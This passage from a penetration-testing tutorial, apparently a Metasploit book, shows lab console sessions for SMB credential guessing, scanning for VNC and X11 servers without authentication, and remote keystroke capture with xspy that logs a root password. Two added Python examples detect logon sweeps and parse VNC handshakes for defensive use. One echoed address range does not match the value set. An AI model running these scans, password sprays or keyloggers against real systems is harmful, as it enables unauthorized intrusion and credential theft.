Although many commercial vulnerability scanners are available on the market, you are not limited to them. When you want to run a scan for a specific vulnerability across a network, Metasploit’s many auxiliary modules can help you accomplish such tasks.
The following Metasploit modules are just a few examples of the many useful auxiliary scanning modules included in the Framework. Take advantage of your lab to probe and explore as many of them as you can.
To check the validity of a username and password combination, use the SMB Login Check Scanner to connect to a range of hosts. As you might expect, this scan is loud and noticeable, and each login attempt will show up in the event logs of every Windows box it encounters.
After selecting the smb_login module with use, you can run show options to see the settings listed under the Required column. Metasploit allows you to specify a username and password combination, a username and password list, or a combination of either. In the next example, RHOSTS is set to a small range of IP addresses and a username and password are configured for Metasploit to try against all addresses.
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options

Module options:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PASS_FILE                       no        File containing passwords, one per line
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       Set the SMB service port
   SMBDomain      WORKGROUP        no        SMB Domain
   SMBPass        password         no        SMB Password
   SMBUser        Administrator    no        SMB Username
   THREADS        50               yes       The number of concurrent threads
   USERPASS_FILE                   no        File containing users and passwords separated by space, one pair per line
   USER_FILE                       no        File containing usernames, one per line

msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-155
RHOSTS => 192.168.1.170-192.168.1.175
msf auxiliary(smb_login) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(smb_login) > set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(smb_login) > run

[*] Starting host 192.168.1.154
[*] Starting host 192.168.1.150
[*] Starting host 192.168.1.152
[*] Starting host 192.168.1.151
[*] Starting host 192.168.1.153
[*] Starting host 192.168.1.155
[+] 192.168.1.155 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[*] Scanned 4 of 6 hosts (066% complete)
[*] Scanned 5 of 6 hosts (083% complete)
[*] Scanned 6 of 6 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) >
You can see a successful login with user Administrator and a password of s3cr3t against 192.168.1.155. Because workstations are all cloned from one image and deployed through the enterprise in many corporate environments, the administrator password may well be the same on all of them, granting you access to every workstation on the network.
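The text notes that every attempt the SMB Login Check Scanner makes is recorded in the event log of each Windows host it touches. The following added example (not from the book) shows the defender's side of that: it runs over a few constructed, simplified Windows Security events collected from several hosts and flags a source that tries one account against many hosts in a short window, which is what the sweep above looks like from a log aggregator. The line format, host names and 192.168.1.20 source are constructed; Event IDs 4625 (failed logon), 4624 (successful logon) and logon type 3 (network) are the real Windows values.

```python
"""Spot an smb_login-style sweep in Windows Security events from several hosts."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export (hypothetical format), one event per line:
# timestamp | reporting host | EventID | LogonType | account | source address
SAMPLE_EVENTS = """\
2024-05-01T02:10:01|WS150|4625|3|Administrator|192.168.1.20
2024-05-01T02:10:01|WS151|4625|3|Administrator|192.168.1.20
2024-05-01T02:10:02|WS152|4625|3|Administrator|192.168.1.20
2024-05-01T02:10:02|WS153|4625|3|Administrator|192.168.1.20
2024-05-01T02:10:02|WS154|4625|3|Administrator|192.168.1.20
2024-05-01T02:10:03|WS155|4624|3|Administrator|192.168.1.20
2024-05-01T02:11:40|WS151|4625|3|jsmith|192.168.1.77
2024-05-01T09:00:00|WS152|4624|2|jsmith|-
"""

def parse_events(text):
    events = []
    for line in text.splitlines():
        ts, host, eid, ltype, user, src = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "event_id": int(eid), "logon_type": int(ltype),
                       "user": user, "src": src})
    return events

def find_logon_sweeps(events, min_hosts=3, window=timedelta(minutes=5)):
    """One alert per (source, account) whose network logons (type 3) reached
    at least `min_hosts` distinct hosts inside `window`; lists hosts where the
    logon succeeded (4624), since those are the ones the scanner reports as hits."""
    by_key = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3 and e["event_id"] in (4624, 4625) and e["src"] != "-":
            by_key[(e["src"], e["user"])].append(e)
    alerts = []
    for (src, user), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            # Every event for this pair that falls within `window` of event i.
            burst = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            hosts = {e["host"] for e in burst}
            if len(hosts) >= min_hosts:
                alerts.append({"src": src, "user": user, "hosts": sorted(hosts),
                               "succeeded": sorted(e["host"] for e in burst
                                                   if e["event_id"] == 4624)})
                break  # one alert per source/account pair
    return alerts

if __name__ == "__main__":
    for a in find_logon_sweeps(parse_events(SAMPLE_EVENTS)):
        print(f"{a['src']} tried {a['user']} on {len(a['hosts'])} hosts; "
              f"succeeded on {a['succeeded']}")
```

The interactive logon by jsmith (type 2, no source address) and the single network attempt from 192.168.1.77 are ignored, so only the sweep produces an alert.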
Virtual network computing (VNC) provides graphical access to remote systems in a way that’s similar to Microsoft’s Remote Desktop. VNC installations are common throughout corporations, because they provide a GUI-based view of server and workstation desktops. VNC is frequently installed to meet a temporary need and then completely forgotten and left unpatched, creating a major potential vulnerability. Metasploit’s built-in VNC Authentication None scanner searches a range of IP addresses for VNC servers that do not have a password configured (that support “None” authentication, meaning a blank password). Usually, this scan will turn up nothing of value, but a good penetration tester leaves no stone unturned when looking for ways to access a target system.
Recent VNC servers do not allow blank passwords. To set one up in your lab for testing, use older VNC servers such as RealVNC 4.1.1.
The VNC scanner, like most Metasploit auxiliary modules, is easy to configure and run. The only required configuration for vnc_none_auth is to supply it with an IP or a range of IPs to scan. Simply select the module, define your RHOSTS and THREADS, if desired, and run it, as shown next:
msf > use auxiliary/scanner/vnc/vnc_none_auth
msf auxiliary(vnc_none_auth) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    5900             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(vnc_none_auth) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf auxiliary(vnc_none_auth) > run

[*] 192.168.1.155:5900, VNC server protocol version : RFB 003.008
[*] 192.168.1.155:5900, VNC server security types supported : None
[*] 192.168.1.155:5900, VNC server security types includes None, free access!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(vnc_none_auth) >
If you get lucky and Metasploit finds a VNC server with no authentication, you can use Back|Track’s vncviewer to connect to the target machine without a password, as shown in Figure 4-18.
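The two lines the scanner printed above (the RFB 003.008 version banner and the "security types supported : None" verdict) come straight from the first bytes a VNC server sends. The added example below, written for this page and not taken from the book or the Metasploit module, parses that server-side handshake offline from constructed byte strings, so you can check a captured banner or audit your own lab server without connecting to anything. It handles both the RFB 3.7/3.8 list form and the older 3.3 form, and the refusal message a busy server sends instead of a type list; the sample byte strings are constructed, the type numbers are the RFB spec's.

```python
"""Parse the server side of an RFB (VNC) handshake and flag 'None' authentication."""
import struct

# Security type numbers from the RFB protocol; type 1 means no authentication.
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  16: "Tight", 18: "TLS", 19: "VeNCrypt"}

def parse_rfb_server_handshake(data: bytes) -> dict:
    """Return version, offered security types and whether 'None' is offered.

    `data` is what the server sends before it needs any client reply beyond the
    version echo: the 12-byte ProtocolVersion message plus the security message.
    """
    if len(data) < 12 or not data.startswith(b"RFB ") or data[11:12] != b"\n":
        raise ValueError("not an RFB ProtocolVersion message")
    version = data[:11].decode("ascii")            # e.g. "RFB 003.008"
    major, minor = int(version[4:7]), int(version[8:11])
    body = data[12:]
    if not body:
        raise ValueError("security message missing")
    types, reason = [], None
    if (major, minor) <= (3, 3):
        # RFB 3.3: the server dictates a single type as a 4-byte big-endian word;
        # 0 means the connection failed and a length-prefixed reason follows.
        (t,) = struct.unpack("!I", body[:4])
        if t == 0:
            (n,) = struct.unpack("!I", body[4:8])
            reason = body[8:8 + n].decode("latin-1")
        else:
            types = [t]
    else:
        # RFB 3.7/3.8: a 1-byte count, then that many 1-byte security types;
        # count 0 again means failure with a length-prefixed reason string.
        count = body[0]
        if count == 0:
            (n,) = struct.unpack("!I", body[1:5])
            reason = body[5:5 + n].decode("latin-1")
        else:
            types = list(body[1:1 + count])
    names = [SECURITY_TYPES.get(t, f"Unknown({t})") for t in types]
    return {"version": version, "security_types": names,
            "none_auth": 1 in types, "reason": reason}

# Constructed samples: the first is what the 192.168.1.155 server above would send.
SAMPLE_NONE = b"RFB 003.008\n" + bytes([1, 1])
SAMPLE_VNCAUTH = b"RFB 003.008\n" + bytes([2, 2, 16])
SAMPLE_33 = b"RFB 003.003\n" + struct.pack("!I", 2)
SAMPLE_REFUSED = b"RFB 003.008\n" + bytes([0]) + struct.pack("!I", 20) + b"Too many connections"

if __name__ == "__main__":
    for sample in (SAMPLE_NONE, SAMPLE_VNCAUTH, SAMPLE_33, SAMPLE_REFUSED):
        print(parse_rfb_server_handshake(sample))
```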
If you think a VNC scan is likely to be a waste of time and that you’ll never find systems with open VNC servers enabled, think again. During a large penetration test, which included thousands of systems, one of the authors noticed that one of those systems had an open VNC server.
While the author was in the system documenting his finding, he noticed activity on the system. This was overnight on a system that was unlikely to have an authorized user on it. While not always considered a best practice, the author pretended to be another unauthorized intruder and engaged the intruder in conversation via Notepad. The intruder was not very bright and told the author that he was scanning large blocks of systems for open VNC servers. Here is a segment of the conversation:
Author: You in the us? or out of country? I know some people in denmark.
Attacker: I’m from Norway actually, hehe, I have relatives in Denmark.
Author: You hang in any boards? like I used to like some but they have been going away
Attacker: I mostly hang in some programming boards, but not much else. Have you been into hacking for a long time or what? What’s your age btw? I’m 22.
Author: I have been on this for like fun for around a year or so. Still in school. 16. Just something to do.
Attacker: Haven’t been there. I too mostly do this for fun, just trying to see what I can do, test my skills. I wrote the “VNC finder” myself btw, I have found a lot of servers, but this is the only one where I could actually have some fun
Author: Wow. What did you write it in? Can I dl it? Do you have a handle?
Attacker: It’s written in a language called PureBasic, but it’s kinda not ready for release yet, it’s only for my own use. But maybe I can share it anyway, I could upload the code somewhere and let you compile it. That is if you can find some PureBasic compiler on some warez site :P
Author: Thats cool. you can put it in that pastebin site from irc. That lets you anon post I have not done purebasic before. just python and perl
Attacker: Let me see, I'll look for that pastebin site and upload it, just give me some minutes, I’ll be around.
The attacker then gave the author a link to a pastebin page with the full source for the custom VNC scanner he was using.
Metasploit’s built-in open_x11 scanner is similar to the vnc_none_auth scanner, in that it scours a range of hosts for X11 servers that allow users to connect without authentication. Although X11 servers aren’t widely used today, lots of archaic boxes out there are still running old, unpatched, and forgotten operating systems. As you’ve seen in the preceding two examples, legacy systems are often the most vulnerable systems on a network.
To run the open_x11 scanner, simply configure as you would most other auxiliary modules by setting the RHOSTS and, optionally, the THREADS values. A session is shown next. Notice at IP address 192.168.1.23 that the scanner has found an open X server. This is a serious vulnerability because it allows an attacker to gain unauthenticated access to the system: the X system handles the GUI, including the mouse and keyboard.
msf > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(open_x11) > set THREADS 50
THREADS => 50
msf auxiliary(open_x11) > run

[*] Trying 192.168.1.1
[*] Trying 192.168.1.0
[*] Trying 192.168.1.2...
[*] Trying 192.168.1.29
[*] Trying 192.168.1.30
[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)
[*] Trying 192.168.1.31
[*] Trying 192.168.1.32
. . . SNIP . . .
[*] Trying 192.168.1.253
[*] Trying 192.168.1.254
[*] Trying 192.168.1.255
[*] Auxiliary module execution completed
To see what an attacker could do with a vulnerability like this, start keystroke logging using Back|Track’s xspy tool, like so:
root@bt:/# cd /pentest/sniffers/xspy/
root@bt:/pentest/sniffers/xspy# ./xspy -display 192.168.1.23:0 -delay 100
ssh root@192.168.1.11(+BackSpace)37 sup3rs3cr3tp4s5w0rd ifconfig exit
The xspy tool remotely sniffs the X server’s keyboard session and has captured a user running SSH to log in as root on a remote system. Vulnerabilities such as this can be rare, but when you find them they are extremely valuable.